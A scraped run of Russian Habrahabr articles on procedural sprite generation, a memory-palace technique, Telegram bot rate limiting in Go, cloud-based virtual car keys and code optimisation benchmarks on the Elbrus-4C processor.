Это был очень интересный способ провести субботу, и я хочу поблагодарить Galaxy Kate (Kate Compton) и Ben Grue (Ben McGraw) за организацию мероприятия, а также коворкинг GameNest за предоставленное помещение.
Можете посетить мой персональный блог http://davideyork.com , в котором я пишу о процедурной генерации и инди-разработке игр.
Мой код реализации этого проекта можно скачать на Github . Я написал его на C# и он должен быть совместим с Unity. Учтите, что я включил в него полную палитру и примеры изображений, но там нет исходных спрайтов и изображений, полученных из набора 16-битных спрайтов . Эти спрайты можно приобрести у Кристофера Барретта aka Oryx из Oryx Design Lab . Они не разделены на части, я делал это сам. Это огромный набор спрайтов, и он практически бесплатный. Oryx потратил на него кучу времени, рекомендую оценить его (нет, мне за эти слова ничего не платили).
Развлекайтесь! | https://habrahabr.ru/post/317570/ |
habrahabr | Помнить всё: метод римской комнаты | ['память человека', 'самоорганизация'] | «Записывайте всё!» — говорит гуру GTD Дэвид Аллен. Создайте систему для записи, которой всецело доверяете, и — записывайте всё!
Совет прекрасный, но не всегда есть под рукой система, которой я... | «Записывайте всё!» — говорит гуру GTD Дэвид Аллен. Создайте систему для записи, которой всецело доверяете, и — записывайте всё!
Совет прекрасный, но не всегда есть под рукой система, которой я доверяю. И не всегда я ей доверяю. Бывают ситуации, когда ни записать, ни прочитать записанное невозможно. На пробежке, например. На грани сна. В бане. Во время шторма на палубе каравеллы.
В конце концов, эту чудесную систему можно где-то потерять.
В таких случаях всё-таки придётся использовать голову, но не загружая её. И лучший из известных мне способов это сделать — метод римской комнаты. Также его называют дворец памяти или дорога Цицерона.
Когда я решил попробовать этот способ, ожидал найти в Интернете готовый рецепт, как это делать правильно и удобно, но не нашёл. В большинстве текстов объясняются только базовые принципы. Да и не всегда объясняются, многие авторы явно пишут с чужих слов. Дьявол в деталях, а про них тишина. Ответов на возникающие по ходу дела вопросы я не нашёл, поэтому пришлось писать их самому. Вот всегда так.
Обратите внимание, что в первую очередь меня интересовала организация времени. Вернее, заметки и памятки, предназначенные для занесения в традиционную систему организации дел, как только она будет доступна. Сформулируем задачу
Во-первых, система должна позволять надёжно запоминать список идей, дел и вопросов с тем, чтобы позже его можно было обработать и переместить во внешнее хранилище. Во-вторых, нужна возможность вспоминать о делах вовремя, то есть в нужный день, даже если никаких напоминаний на телефоне я услышать не могу.
Кратко про сам метод римской комнаты. В воображении создаётся комната (или дорога, или просто какое-то место). Понятия, которые надо запомнить, ассоциируются с элементами этого пространства, с предметами в нем. После этого для припоминания достаточно представить эту комнату или мысленно пройтись по дороге, вспоминая ассоциированную информацию. Это основа метода, которую я немного изменил. Реализуем систему
Я создал шесть комнат по числу дней недели, с одной общей комнатой на выходные. Можно сделать семь, если хотите. Идеи, приходящие в начале дня, кладутся в комнату этого же дня, их я разбираю днём или вечером. Если вернуться к размышлению над ними смогу только завтра, то и помещаю их в завтрашнюю комнату.
То, что нужно не забыть сделать, кладётся накануне в нужную комнату, это понятно. Недельного горизонта более чем достаточно, сроки больше недели планируются в SmartProgress и на бумаге.
Через пару недель эксплуатации, опираясь на накопленный опыт, я ввёл ещё одну комнату — «вечер». Это короткоживущий буфер, который очищается перед сном. Туда складываются вещи, которые нужно сделать вечером текущего дня: заехать после работы в банк, «дорогой, купи молока» и тому подобное. Вообще-то у меня это не комната. Это подоконник на фоне чудного зимнего ночного пейзажа. Вечер же. А подоконника хватает. Если не хватает, значит дел слишком много, надо прорежать. Детали и тонкости
А теперь к тем самым частностям, которых я не нашёл в других статьях и которые сработали для меня. Например, я отказался от рекомендуемого движения по определённому маршруту в комнате, мои комнаты статичны. Зато ввёл понятие поверхности, что сильно упорядочило процесс.
Сама римская комната — это помещение, которое вы можете хорошо представить, и почувствовать себя находящимся там. Должно ли оно быть реальным или его можно придумать? Это неважно. Как вам удобнее. Но если оно существует в реальности, то не должно вызывать сильных эмоций, а если придумано, нужно сразу продумать все детали, запомнить их и потом уже не менять без особых причин. В помещении понадобятся поверхности для размещения предметов — стена, стол, стойка, прилавок, но не должно быть самих предметов. Потому что все, что не приколочено к комнате, будет теми самыми воспоминаниями, которые вы и хотите сохранить.
Потратьте немного времени на проработку помещений. Чётко представлять нужно только сами поверхности, остальная часть комнаты может быть смутной, главное, чтобы разные комнаты не путались друг с другом. Количество поверхностей выбирайте в зависимости от предполагаемого числа напоминаний. Помните о том, что человек одновременно воспринимает 7 ± 2 объекта, поэтому на одной поверхности я не рискую размещать больше пяти. Лично мне всегда хватает двух поверхностей на комнату: стена и стол или стойка. Иногда ещё с потолка свисает вывеска. Как использовать
Представьте себя в нужной комнате, вспомните основные детали дела, которое нужно запомнить, придумайте подходящий предмет — от рваного носка до диадемы с бриллиантами — и поместите его на поверхность. При каждом обновлении списка предметов припоминайте все, которые должны там находиться.
Следуйте интуиции. И на этапе создания комнат и при эксплуатации системы. Если что-то упорно хочет выглядеть не так, как вам кажется правильным, разрешите. Не придумывайте предмет, а берите тот, образ которого первым всплыл. Я не знаю, почему один телефонный разговор у меня выглядит как айфон, а другой как древний настенный аппарат с раздельными трубками. И третий как моток шерсти. Видимо, так надо, я просто не сопротивляюсь. Подсознание явно что-то знает. Не напрягайтесь, через несколько дней вы обнаружите, что система работает, и начнёте ей доверять, а она от этого заработает ещё лучше.
Встречал рекомендации помещать в комнату картофелину и бутылку, чтобы не забыть купить картошку и вино. Боже упаси. Прямолинейность вас погубит, она слишком скучна для запоминания.
В последнее время стал экспериментировать с вложенностью. В качестве дополнительной временной поверхности представляю поднос, на котором икебаной разложены всякие мелкие штучки. Очень удобно оказалось создавать список заметок к читаемой книге в положении «вис с прогибом» в метро.
Система, о которой мы говорим, не предназначена для долговременного хранения. Мои комнаты опустошаются регулярно, поэтому я и использую отдельно стоящие предметы, а не элементы пейзажа. Если вы намерены провести в отшельничестве пять лет и каждый день запоминать заметки к будущим мемуарам, вероятно, вам нужно что-то другое. Или то же, но иначе организованное. Я обязательно поэкспериментирую с этим методом для запоминания конспекта объёмной инструкции или чего-то ещё более фундаментального, надеюсь, что сработает, но пока этого не делал. Если у вас есть такой опыт, расскажите в комментариях.
Ну и конечно, помните: это не дубль системы записи, а костыль на случай её недоступности. «Человек не должен зависеть от длины своего меча», — говорил Миямото Мусаси. И от наличия записной книжки не должен зависеть, — добавляем мы. Но когда книжка доступна, записывайте всё!
Читайте больше наших статей в нашем блоге: SmartTalks | https://habrahabr.ru/company/smartprogress/blog/317464/ |
habrahabr | Лимиты Telegram bot API и работа с ними на Go | ['telegram', 'go', 'gamedev'] | Довольно часто на Хабре появляются статьи о написании бота для Telegram, которые в своем роде, если откинуть уникальность идеи, являются самым обычным туториалом на тему «как получить сообщение от... | Довольно часто на Хабре появляются статьи о написании бота для Telegram, которые в своем роде, если откинуть уникальность идеи, являются самым обычным туториалом на тему «как получить сообщение от Telegram, обработать его и отправить ответ пользователю». Однако ни в одной из статей, прочтенных мной (конечно же, не берусь утверждать, что прочел их все, но тем не менее) я не встретил упоминания о лимитах отправки сообщений пользователям и как с ними работать. Кого заинтересовал, прошу под кат.
Некоторое время назад я сел за разработку текстовой многопользовательской стратегии на основе API бота Telegram, а спустя уже месяц запустил первый релиз со скудным, но играбельным функционалом. По цепочке знакомств игра быстро набрала небольшую активно играющую аудиторию и продолжала набирать в последующие дни благодаря внутриигровой реферальной программе. И вроде бы все хорошо, пока дневной онлайн не перевалил за отметку в двести пользователей. Вот тут и начались проблемы. Все чаще пользователи обращались ко мне с вопросом, почему бот не отвечает по несколько минут. Дискомфорт игрокам доставлялся сильнейший, особенно во время войн, когда пользователь пытался быстро восстановить армию для контратаки, а игра предательски висла и не отвечала ни на какие действия. Причем Telegram мог забанить как отсылку всех сообщений, так и только сообщения конкретного содержания при частом его использовании, например, покупка ресурсов и вербовка воинов, где использовались кнопки кастомной клавиатуры со стандартными количественными значениями.
Опыт работы с API бота уже имелся, однако на меньшей аудитории и с меньшей интенсивностью отправки. Про лимиты тоже было известно, но реально сталкивался с ними только при работе с группами. Там все намного жестче, чем при работе с персональными чатами. Чтобы узнать больше о лимитах, достаточно обратится к FAQ на официальном сайте Telegram. My bot is hitting limits, how do I avoid this? When sending messages inside a particular chat, avoid sending more than one message per second. We may allow short bursts that go over this limit, but eventually you'll begin receiving 429 errors.
If you're sending bulk notifications to multiple users, the API will not allow more than 30 messages per second or so. Consider spreading out notifications over large intervals of 8—12 hours for best results.
Из указанного выше имеем, что нельзя отправлять конкретному пользователю сообщения чаще чем раз в секунду и не более 30 сообщений в секунду при массовой рассылке разным пользователям. Но допускаются некоторые погрешности. Следовательно нам необходимо каждые 1/30 секунд отправлять сообщение пользователю, проверяя, не посылали ли мы уже ему сообщение в течении текущей секунды, иначе послать сообщение для следующего пользователя, если тот прошел эту же проверку.
Так как разработка изначально велась на языке Go, где имеются каналы и сопрограммы, (они же горутины), то на ум пришла сразу же идея отправки отложенных сообщений. Сначала складываем обработанный ответ в канал, а в отдельном потоке разгребаем этот канал каждые дозволенные нам 1/30 секунд. Но идея с одним каналом для всех сообщений не сработала. Достав из канала сообщение и убедившись, что этому пользователю мы пока слать сообщения не можем, нам необходимо это сообщение куда-то деть. Отправлять снова в этот же канал не хорошо, потому что мы сломаем хронологический порядок сообщений пользователя, а так же сильно отложим доставку этого сообщения при большом количестве активных игроков. Проверить сообщение, не доставая его из канала и перейти к следующему, насколько я знаю, мы тоже не можем.
Тогда появляется идея завести по каналу на пользователя. С этого момента поподробнее. // Мап каналов для сообщений, где ключом является id пользователя
var deferredMessages = make(map[int]chan deferredMessage)
// Здесь будем хранить время последней отправки сообщения для каждого пользователя
var lastMessageTimes = make(map[int]int64)
// chatId – id пользователя, которому шлем сообщения
// method, params, photo – заранее подготовленные параметры для запроса согласно bot API Telegram
// callback будем вызывать для обработки ошибок при обращении к API
type deferredMessage struct {
chatId int
method string
params map[string]string
photo string
callback func (SendError)
}
// Метод для отправки отложенного сообщения
func MakeRequestDeferred(chatId int, method string, params map[string]string, photo string, callback func (SendError)) {
dm := deferredMessage{
chatId: chatId,
method: method,
params: params,
photo: photo,
callback: callback,
}
if _, ok := deferredMessages[chatId]; !ok {
deferredMessages[chatId] = make(chan deferredMessage, 1000)
}
deferredMessages[chatId] <- dm
}
// error.go, где ChatId – id пользователя
type SendError struct {
ChatId int
Msg string
}
// Имплементация интерфейса error
func (e *SendError) Error() string {
return e.Msg
}
Теперь с ходу для обработки получившегося набора каналов хочется воспользоваться select case конструкцией, однако проблема в том, что она описывает фиксированный набор каналов для каждого case, а в нашем случае набор каналов динамический, так как пользователи добавляются в процессе игры, создавая новые каналы для своих сообщений. В противном случае не обойтись без блокировок. Тогда, обратившись к Google, как обычно, на просторах StackOverflow нашлось отличное решение. А заключается оно в использовании функции Select из пакета reflect .
Если коротко, то эта функция позволяет нам извлечь из заранее сформированного массива SelectCase'ов, каждый из которых содержит канал, сообщение, готовое для отправки. Принцип тот же, что и в select case, но с неопределенным числом каналов. То что нам и нужно. func (c *Client) sendDeferredMessages() {
// Создаем тикер с периодичностью 1/30 секунд
timer := time.NewTicker(time.Second / 30)
for range timer.C {
// Формируем массив SelectCase'ов из каналов, пользователи которых готовы получить следующее сообщение
cases := []reflect.SelectCase{}
for userId, ch := range deferredMessages {
if userCanReceiveMessage(userId) && len(ch) > 0 {
// Формирование case
cs := reflect.SelectCase{Dir: reflect.SelectRecv, Chan: reflect.ValueOf(ch)}
cases = append(cases, cs)
}
}
if len(cases) > 0 {
// Достаем одно сообщение из всех каналов
_, value, ok := reflect.Select(cases)
if ok {
dm := value.Interface().(deferredMessage)
// Выполняем запрос к API
_, err := c.makeRequest(dm.method, dm.params, dm.photo)
if err != nil {
dm.callback(SendError{ChatId: dm.chatId, Msg: err.Error()})
}
// Записываем пользователю время последней отправки сообщения.
lastMessageTimes[dm.chatId] = time.Now().UnixNano()
}
}
}
}
// Проверка может ли уже пользователь получить следующее сообщение
func userCanReceiveMessage(userId int) bool {
t, ok := lastMessageTimes[userId]
return !ok || t + int64(time.Second) <= time.Now().UnixNano()
}
Теперь по порядку. Для начала мы создаем таймер, который будет «тикать» каждые необходимые нам 1/30 секунд, и запускаем на нем цикл for.
После чего начинаем формировать необходимый нам массив SelectCase'ов, перебирая наш мап каналов, и складывая в массив только те непустые каналы, пользователи которых уже могут получать сообщения, то есть прошла одна секунда с момента прошлой отправки.
Создаем для каждого канала структуру reflect.SelectCase, в которой нам нужно заполнить два поля: Dir – направление (отправка в канал или извлечение из канала), в нашем случае устанавливаем флаг reflect.SelectRecv (извлечение) и Chan – собственно сам канал.
Закончив формировать массив SelectCase'ов, отдаем его в reflect.Select() и получаем на выходе id канала в массиве SelectCase'ов, значение, извлеченное из канала и флаг успешного выполнения операции. Если все хорошо, делаем запрос на API и получаем ответ. Получив ошибку, вызываем callback и передаем туда ошибку. Не забываем записать пользователю дату последней отправки сообщения
Вот так, вроде бы все просто. Теперь Telegram не придерется к нашему боту из-за частой отправки сообщений пользователю, а игрокам будет комфортно играть. Конечно, понятно, что при огромном количестве пользователей сообщения будут отправляться игроку все медленнее и медленнее, но это будет делаться равномерно, создавая меньше неудобств, чем при единичных блокировках на несколько минут, если не следовать лимитам.
Кстати вспомним об оговореных в FAQ погрешностях. Я в своей реализации шлю пользователям два сообщения в секунду вместо одного и не раз в 1/30 секунду, а раз в 1/40, что намного чаще чем рекомендуется. Но пока проблем не возникало.
Исходный код клиента можно посмотреть на gitlab
Ну а если кому-то стало интересно о чем речь, то в Telegram @ BastionSiegeBot | https://habrahabr.ru/post/317666/ |
habrahabr | Виртуальные ключи к реальному миру | ['интернет вещей', 'автомобили', 'безопасность', 'безопасность в сети'] | Представьте, что у вас появилась удобная возможность обеспечить безопасный и удобный совместный доступ к автомобилю без необходимости физически отдавать ключи от него. С ростом популярности... | Представьте, что у вас появилась удобная возможность обеспечить безопасный и удобный совместный доступ к автомобилю без необходимости физически отдавать ключи от него. С ростом популярности технологии виртуальных ключей, когда информация о правах доступа к автомобилю наряду с прочими данными хранится в облаке, это становится вполне реальным, и развитие этой технологии способно не только упростить совместное использование автомобилей, но и значительно повлиять на бизнес прокатных компаний по всему миру.
Благодаря технологии Valeo InBlue, опирающейся на решение Gemalto Allynis Trusted Services Hub, теперь вы можете получить доступ к автомобилю со смартфона или умных часов. Решение Valeo InBlue представлено на платформах Android и iOS и позволяет заводить и глушить автомобиль, а также управлять различными приложениями и просматривать текущие данные с различных бортовых систем, используя бортовое оборудование, привязанное к Smartphone Development Kit (SDK), при этом виртуальный ключ от автомобиля размещается в облаке.
А теперь представим, что означает сама возможность безопасной передачи по воздуху идентификационных данных и соответствующих прав для совместного использования автомобилей, будь то внутри семьи или среди более широкого круга лиц. Технология позволяет передавать защищенный цифровой ключ кому-либо без необходимости личной встречи с этими лицами. Вы можете легко и просто забронировать автомобиль с помощью своего мобильного телефона, получить всю необходимую информацию о его местоположении и о наличии топлива в бензобаке, а также получить защищенные виртуальные ключи от него. Такое решение будет востребовано не только в семье, например, позволяя родителям в свое отсутствие предоставить семейный автомобиль няне или детям, но и сможет изменить бизнес-модель прокатных компаний, обеспечивая им новые возможности для более эффективного управления своим парком автомобилей.
Например, как показывает исследование Observatoire Cetelem, более 40% европейцев планируют совместное использование автомобилей в ближайшие годы, и уже более 3,5 миллионов принадлежат к различным клубам кар-шеринга, предоставляющим более 70 тысяч автомобилей по всему миру.
Кроме того, эта технология позволяет в удаленном режиме управлять профилями водителей, устанавливая ограничения в привязке к их водительским удостоверениям. Например, если система видит, что водитель только что прошел экзамен и получил права, то она может установить ограничение на допустимый скоростной режим для этого автомобиля, в результате чего управление автомобилем будет безопаснее. Кроме того, к водительскому профилю можно привязать ограничения по географии перемещения или по времени управления автомобилем, не допуская таким образом злоупотреблений, которые могли бы привести к аварии. Введение или восстановление подобных ограничений (которые, например, существовали в России до 1991 года) часто сталкивается именно со сложностями контроля за их исполнением.
Однако, для максимально полной реализации всего потенциала виртуальных ключей необходимо построить надежную архитектуру безопасности, которая бы позволяла защитить учетные данные, передаваемые по воздуху и хранящиеся на мобильных устройствах. Похитители автомобилей, воспользовавшись подобными технологическими уязвимостями, могли бы причинить заметный урон брендам, не говоря о владельцах автомобилей; их действия могли бы стоить немалых денег участникам проекта и привести к дискредитации самой идеи виртуальных ключей у потребителей. С учетом того, что современные злоумышленники постоянно приспосабливаются к новой картине мира, производителям приходится помнить, что доступ к автомобилю с помощью виртуального ключа имеет такую же ценность, как сам автомобиль. Соответственно, необходимо использовать надлежащие решения для обеспечения кибербезопасности, чтобы гарантировать защищенную передачу виртуальных ключей и чтобы доступ к ценной информации имелся только у авторизованных пользователей.
Хаб безопасности Gemalto’s Allynis Trusted Security Hub ( англ. ), использованный, в частности, в решении Valeo InBlue, обеспечивает возможность защищенного развертывания в режиме Over-The-Air и управления жизненным циклом приложений и критически важных данных при работе с автомобилем. В результате виртуальные ключи от автомобиля можно в защищенном режиме передавать на смартфоны и хранить их там, при этом обеспечивается высокий уровень безопасности, сопоставимый с тем, который достигается в современных решениях мобильной оплаты, внедряемых банками по всему миру, где у Gemalto также имеется немалый опыт.
Очевидно, что развитие решений виртуальных ключей от автомобилей и интернета вещей (IoT) открывает новые возможности для самых различных секторов рынка. Действительно, существует огромное число новых сервисов, которые могут заметно вырасти благодаря этой технологии. Службы доставки могут использовать ее, чтобы оставлять посылки в багажнике автомобиля, когда владельца нет поблизости. Или, к примеру, виртуальный ключ может использоваться, чтобы предоставлять механику доступ к автомобилю для устранения неполадки, пока владелец занимается своими делами в офисе.
Впечатляет? А что вы думаете об эволюции автомобильных, и не только автомобильных, ключей? | https://habrahabr.ru/company/gemaltorussia/blog/317668/ |
habrahabr | Оптимизация кода для платформы Эльбрус на простых примерах | ['Эльбрус', 'МЦСТ', 'Elbrus', 'распознавание', 'распознавание изображений', 'распознавание паспорта', 'оптимизация кода', 'SPARC'] | "Обычно хакер пишет программы не ради выгоды,
а ради собственного удовольствия. Такая программа
может оказаться полезной, а может остаться
всего лишь игрой интеллекта."
Генри С.... | "Обычно хакер пишет программы не ради выгоды,
а ради собственного удовольствия. Такая программа
может оказаться полезной, а может остаться
всего лишь игрой интеллекта."
Генри С. Уоррен. Алгоритмические трюки для программистов [1] Сегодня мы продолжим наши заметки об Эльбрусе. Первую статью, посвященную запуску и оптимизации системы распознавания паспорта, можно прочитать тут . Однажды мы с коллегами заинтересовались, как самые простые методы оптимизации работают на Эльбрусе. Процессор Эльбрус имеет VLIW (Very Long Instruction Word) архитектуру — то есть оперирует “широкими” командными словами. Это означает, что компилятор lcc анализирует исходный код программы при компиляции, определяет зависимости между командами и формирует широкие командные слова. В одном таком слове можно уместить до 23 действий, которые будут исполняться одновременно. Если использовать SIMD (Single Instruction Multiple Data), то это число может возрасти до 33 и более операций. Команды в широком слове исполняются параллельно, обеспечивая загрузку всех 6 арифметико-логических устройств на каждом процессоре. Распараллеливание и загрузка всех вычислителей целиком ложится на плечи оптимизирующего компилятора, что позволяет значительно упростить аппаратуру для анализа и исполнения команд и снизить энергопотребление до 45 Вт для Эльбрус-4С [2, 3]. Мы в Smart Engines задались вопросом, как будут работать все привычные оптимизации, такие как, например, развертывание циклов, на столь непривычной платформе с “умным” компилятором. Мы рассмотрели простые примеры на С++ и сравнили результаты работы на Эльбрус-4С и Intel Core i7-6700K. На Эльбрусе использовался компилятор lcc версии 1.20.17, для Core i7 — Microsoft Visual Studio Community 2015. Для lcc мы использовали флаги компиляции -O3 и -ffast-math. Для начала, приведем характеристики Эльбрус-4С и Intel Core i7-6700K:
Эльбрус-4С
Intel Core i7-6700K
Архитектура
Эльбрус
Skylake-S
Частота, GHz
0.8
4
Число ядер
4
4 (8 c Hyper-Threading)
Технологический процесс
65 nm
14 nm
Cache L1 size, data
64 Kb
32 Kb
Cache L1 size, instructions
128 Kb
32 Kb
Cache L2 size
8 Mb
1 Mb
Cache L3 size
-
8 Mb
Тип оперативной памяти
DDR3-1600
DDR4-2133
Потребляемая мощность, Вт
45
91
Тактовая частота этих процессоров значительно отличается: 800 МГц у Эльбрус-4С и 4 ГГц у Intel Core i7. Также заметим, что Эльбрус имеет другую структуру кэш-памяти: отсутствует L3 кэш, однако размер L2 кэша составляет 8 Mb (по 2 Mb на ядро), в то время как у рассмотренного Core i7 1 Mb (по 0.25 Mb на ядро). L1 кэш на Эльбрусе также больше, особенно кэш инструкций (128 Kb против 32 Kb). Пример 1. Развертывание циклов Эта оптимизация направлена на уменьшение числа итераций цикла (а значит и уменьшение количества проверок условия выхода из цикла) путем увеличения тела цикла. Такая оптимизация хорошо подходит для простых циклов, которые встречаются практически в каждой программе. Теперь рассмотрим пример: #define N 64000
unsigned int x = 0;
unsigned int a[N];
for (int i = 0; i < N; ++i)
a[i] = i;
//Оптимизируемый цикл
for (int k = 0; k < N;)
{
x += a[k];
a[k++] = k;
} Последний цикл мы и попробовали развернуть. Результаты замеров времени (для 10000 итераций цикла) приведены в таблице 1. Стоит отметить, что на Эльбрусе использовался 32-битный режим адресации (флаг компилятора -mptr32). Мы также рассчитали время работы на 1 ГГц путем умножения измеренного времени на тактовую частоту процессора в ГГц. Полученная таким образом безразмерная величина позволяет сравнить производительность Эльбрус и Core i7 с учетом различия в тактовой частоте. Таблица 1. Время работы в зависимости от N — числа развернутых итераций.
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
N
Время, мс
Время в пересчете на 1 ГГц
Время, мс
Время в пересчете на 1 ГГц
1
401
320
255
1020
2
400
320
275
1100
4
401
320
261
1044
8
401
320
247
988
16
401
320
361
1444
32
452
362
262
1048
64
451
362
262
1048
Можно видеть, что развертывание цикла в данном примере не дает выигрыша во времени работы как на современном Core i7, так и на Эльбрус-4С. В случае совсем простого цикла, который мы рассмотрели, Эльбрус-4С работает эффективнее Core i7 с учетом отношения частот. Пример 2. Обработка данных различной длины В этом примере мы обрабатываем массив по 1, 4 или 8 байтам. Исходный массив а был выровнен на 8 байт. #define MASK1 0xF1
#define MASK4 0xF1F2F3F4
#define MASK8 0xF1F2F3F4F5F6F7F8
for (k = 0; k < n; ++k)
{
а[k] &= MASK1;
} Результаты замеров времени приведены в таблице 2. Таблица 2. Время работы в зависимости от N — числа обрабатываемых байт.
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
N
Время, мс
Время в пересчете на 1 ГГц
Время, мс
Время в пересчете на 1 ГГц
1
2400
1920
811
3244
4
600
480
201
804
8
300
240
102
408
Можно видеть, что обработка по 4 и 8 байт работает быстрее как на современном Core i7, так и на Эльбрус-4С, причем времена уменьшаются кратно числу обрабатываемых байт. Кроме того, Эльбрус работает эффективнее Core i7 с учетом отношения частот. Пример 3. Использование SIMD В этом примере мы решили протестировать интринсики и рассмотрели вычисление скалярного произведения чисел типа float при n = 12800 .
Неоптимизированный цикл: float result = 0.0;
for (int i = 0; i < n; ++i)
{
result += x[i] * y[i];
} С использованием SSE: float *pX = x;
float *pY = y;
__m128 Sum = _mm_setzero_ps();
int num = n / 4;
for (int i = 0; i < num; ++i, pX += 4, pY += 4)
{
Sum = _mm_add_ps(Sum, _mm_mul_ps(_mm_load_ps(pX), _mm_load_ps(pY)));
}
float result = _mm_extract_ps(Sum, 0) + _mm_extract_ps(Sum, 1) + _mm_extract_ps(Sum, 2) + _mm_extract_ps(Sum, 3); С использованием EML [4] (оптимизированная библиотека под Эльбрус): double result;
eml_Vector_DotProd_32F(x, y, n, &result); Результаты замеров времени приведены в таблице 3. Размер SIMD-регистра на Эльбрус-4С составляет 64 бита (instruction set версии 3), что в общем-то соответствует наблюдаемому ускорению в 2 раза между версией без оптимизаций и версией с SIMD. На Core i7 все тоже довольно правдоподобно, мы оперировали 128-битными регистрами, в которые помещается 4 числа типа float. Кроме того, заметно, что Эльбрус без интринсиков работает эффективнее Core i7 с учетом частоты, а вот с интринсиками времена работы практически совпадают. Таблица 3. Время работы подсчета скалярного произведения.
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
Время, мс
Время в пересчете на 1 ГГц
Время, мс
Время в пересчете на 1 ГГц
Без оптимизации
263
210
99
396
С SIMD
110
88
24
96
Пример 4. Подсчет расстояния Хэмминга между двумя массивами Здесь мы вычисляли расстояние Хэмминга между двоичным представлением двух массивов, т.е. взяли расстояния Хэмминга между двоичными представлениями соответствующих чисел в массивах и нашли их сумму. Для массивов с 8-битными данными мы использовали побитовое ИСКЛЮЧАЮЩЕЕ ИЛИ и предподсчитанную таблицу расстояний: int result = 0;
for (int i = 0; i < n; ++i)
{
result += popcnt_table[x[i] ^ y[i]];
} Для 32- и 64-битных данных мы использовали побитовое логическое ИСКЛЮЧАЮЩЕЕ ИЛИ и интринсики _mm_popcnt_u32, _mm_popcnt_u64 на Intel и интринсики __builtin_e2k_popcnts, __builtin_e2k_popcntd на Эльбрусе. Общая длина массивов x и y в байтах оставалась неизменной и равной n = 512. Результаты замеров времени приведены в таблице 4. Таблица 4. Время подсчета расстояния Хэмминга в зависимости от числа обрабатываемых байт N.
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
N
Время, мс
Время в пересчете на 1 ГГц
Время, мс
Время в пересчете на 1 ГГц
1
630
504
155
620
4
110
88
47
188
8
76
61
15
60
В этом примере мы видим, что интринсики для подсчета числа единиц в 64-битном и 32-битном регистрах и на Эльбрусе, и на Core i7 дают значительное ускорение относительно версии с предподсчитанной таблицей. Кроме того, 32-битная команда popcnt на Эльбрусе работает быстрее, чем на Core i7 с учетом отношения частот. А вот в 64-битной случае времена работы на Core i7 и Эльбрусе сравнялись. Пример 5. Устранение зависимости по данным Данный пример позаимствован из книги Криса Касперски “Техника оптимизации программ. Эффективное использование памяти” [5]. Он демонстрирует, как устранение зависимости по данным помогает повысить производительность. Массив a заполнен нулями, n = 2097152 .
Пример с зависимостью по данным: int x = 0;
for (size_t a = 0; a < BLOCK_SIZE; a += 8 * sizeof(int))
{
x = *(int *)((char *)p1 + a + 0 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 1 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 2 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 3 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 4 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 5 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 6 * sizeof(int));
a += x;
x = *(int *)((char *)p1 + a + 7 * sizeof(int));
a += x;
} Каждый следующий индекс элемента зависит от значения, вычисленного предыдущей командой, поэтому загрузка элементов из памяти происходит последовательно, после завершения выполнения предыдущей инструкции.
Теперь код без зависимости: int x = 0;
for (size_t a = 0; a < BLOCK_SIZE; a += 8 * sizeof(int))
{
x += *(int *)((char *)p2 + a + 0 * sizeof(int));
x += *(int *)((char *)p2 + a + 1 * sizeof(int));
x += *(int *)((char *)p2 + a + 2 * sizeof(int));
x += *(int *)((char *)p2 + a + 3 * sizeof(int));
x += *(int *)((char *)p2 + a + 4 * sizeof(int));
x += *(int *)((char *)p2 + a + 5 * sizeof(int));
x += *(int *)((char *)p2 + a + 6 * sizeof(int));
x += *(int *)((char *)p2 + a + 7 * sizeof(int));
} Результаты замеров времени приведены в таблице 5. Устранение зависимости по данным работает как на Эльбрусе, так и на Core i7, причем на Core i7 время работы различается примерно в 11 раз, а на Эльбрусе — практически в 20! Код с зависимостью по данным отработал на Эльбрусе медленнее, чем на Core i7 в пересчете на 1 ГГц, а вот без зависимости Эльбрус всего в 4 раза медленнее Core i7 (при различии частот в 5 раз). Такие результаты на Эльбрусе можно объяснить наличием механизма асинхронной подкачки массивов (array prefetch buffer), которая работает эффективно, если подкачиваемые элементы располагаются последовательно. Таблица 5. Время чтения зависимых и независимых данных.
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
Время, мс
Время в пересчете на 1 ГГц
Время, мс
Время в пересчете на 1 ГГц
Зависимые данные
605
484
87
348
Независимые данные
32
26
8
32
Пример 6. Многопоточные вычисления Разумеется, мы не могли не рассмотреть такой метод оптимизации, как распараллеливание. Для чистоты эксперимента мы взяли полностью независимые задачи (вычисление скалярного произведения двух массивов типа double). В таблице 6 приведено время последовательной работы N задач (T посл ), время работы N задач в N потоков (T пар ) и ускорение E: Таблица 6. Время последовательного и параллельного вычисления скалярного произведения в зависимости от числа задач и потоков N.
Эльбрус-4С
Эльбрус-4С
Эльбрус-4С
Intel Core i7
Intel Core i7
Intel Core i7
N
T посл , мс
T пар , мс
E=T посл /T пар
T посл , мс
T пар , мс
E=T посл /T пар
2
2628
1316
2.00
1033
500
2.07
4
5259
1318
3.99
1994
500
3.99
8
10513
2634
3.99
3987
503
7.93
16
21045
5268
4.00
7980
1009
7.91
20
26321
6583
4.00
9967
1263
7.89
32
42053
10535
3.99
15948
2014
7.92
40
52566
13170
3.99
19936
2528
7.89
Видно, что на Core i7 ускорение практически в 8 раз достигается на 8 потоках и дальше варьируется незначительно. На Эльбрусе ускорение в 4 раза достигается на 4 потоках и также с увеличением числа потоков не меняется. Соотношение по скорости между Эльбрус и Core i7 оказалось равным примерно 2.6, в то время как отношение частот равно 5. Выводы Привычные методы ускорения вычислений вполне работают на Эльбрусе и в этом плане программирование для него не требует специфических знаний и умений. В рассмотренных элементарных примерах для оптимизации кода Эльбрус показал себя просто замечательно с учетом тактовой частоты в 800 МГц и в два раза меньшей потребляемой мощности по сравнению с Core i7. P.S. А еще мы запустили нашу систему распознавания паспорта на SPARC! Это означает, что теперь мы сможем писать статьи о распознавании на еще одной вычислительной архитектуре. Update . В результаты примера 1 вкралась ошибка, благодаря комментариям VLev мы ее обнаружили и исправили. Результаты обновлены. Использованные источники [1] Генри С. Уоррен, мл. Алгоритмические трюки для программистов. М.: Издательский дом "Вильямс", 2014. ISBN 978-5-8459-1838-3 – 512 С.
